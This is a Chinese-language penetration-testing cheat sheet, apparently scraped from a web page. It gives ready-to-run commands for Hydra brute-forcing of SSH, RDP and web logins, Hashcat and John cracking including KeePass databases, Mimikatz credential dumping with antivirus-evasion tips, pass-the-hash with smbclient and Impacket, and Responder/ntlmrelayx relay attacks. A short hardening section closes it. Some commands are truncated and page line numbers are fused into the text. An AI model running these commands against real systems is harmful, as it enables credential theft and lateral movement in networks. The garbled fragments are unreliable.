一、网络服务登录爆破1.1 SSH/RDP密码爆破12345678# Hydra基础语法(支持多协议)sudo hydra -L <用户名字典> -P <密码字典> [-s 端口] <协议类型>://<目标IP># 示例:SSH爆破sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.1.10# RDP爆破(需确认目标开启RDP)sudo hydra -L users.txt -P pass.txt rdp://192.168.1.20
注意事项:
推荐使用 -t 参数控制并发线程(默认16)
爆破成功后自动输出结果,可使用 -o 指定输出文件
Windows系统建议使用 xfreerdp 验证RDP连接
1.2 HTTP表单爆破12345# 基础语法sudo hydra
参数说明:
^USER^ 和 ^PASS^ 为占位符
失败特征需通过分析响应报文确定
建议使用 -V 参数显示详细输出
二、本地密码爆破与规则优化2.1 工具链组合1234567flowchart TD A[获取哈希文件] --> B(John) A --> C(Hashcat) B --> D{破解成功?} C --> D D -->|是| E[获取明文] D -->|否| F[规则优化]
工具选择:
John:适合快速破解简单密码,支持规则扩展
Hashcat:GPU加速,支持模式更多(包括最新加密算法)
2.2 密码规则语法1234# 示例规则文件 myrules.rule:c $1$! # 首字母大写 + 尾部添加"1!"?d >2 # 当密码长度>2时添加数字后缀
常用操作符:
: 规则起始符
c 首字母大写
$ 尾部追加字符
?l 插入小写字母
sXY 替换X为Y
2.3 Keepass破解12345# 提取哈希keepass2john Database.kdbx > hash.txt# Hashcat破解hashcat -m 13400 hash.txt /usr/share/wordlists/rockyou.txt
三、NTLM攻击体系3.1 哈希获取技术12345# Mimikatz标准流程privilege::debugtoken::elevatesekurlsa::logonpasswordslsadump::sam
防御规避:
使用内存加载执行:Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
配合进程注入技术绕过杀软
3.2 哈希传递攻击SMB协议利用:
1smbclient //192.168.1.50/C$ -U Administrator --pw-nt-hash aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
命令执行:
12345# psexec横向移动impacket-psexec -hashes LMHASH:NTHASH Administrator@192.168.1.50# wmiexec无文件执行impacket-wmiexec -hashes :NTHASH Administrator@192.168.1.50
3.3 Net-NTLMv2攻击Responder嗅探:
1sudo responder -I eth0 -dwPv
中继攻击(需禁用SMB签名):
1impacket-ntlmrelayx -tf targets.txt -smb2support -c "powershell -enc
PowerShell命令加密:
12echo 'Get-Process' | iconv -t UTF-16LE | base64 -w 0# 输出:RwBlAHQALQBQAHIAbwBjAGUAcwBzAA==
四、防御加固建议
网络层防护
启用SMB签名(Group Policy: Computer > MS > MS > Require security signature)
禁用NTLMv1,强制使用Kerberos认证
系统层加固
1234# 启用Credential GuardEnable-WindowsOptionalFeature -Online -FeatureName Windows-Defender-CredentialGuard# 限制WMI执行权限Set-NetFirewallRule -DisplayName "Windows Management Instrumentation (WMI)" -Action Block
监控策略
监控Event ID 4624(登录类型3的网络登录)
建立哈希异常检测机制(如突然出现大量NTLMv1请求)
扩展学习
Hashcat模式速查表:[hashcat.net/wiki/doku.php?id=example_hashes]
Impacket官方示例:[github.com/SecureAuthCorp/impacket/tree/master/examples]
Active Directory安全手册:[adsecurity.org]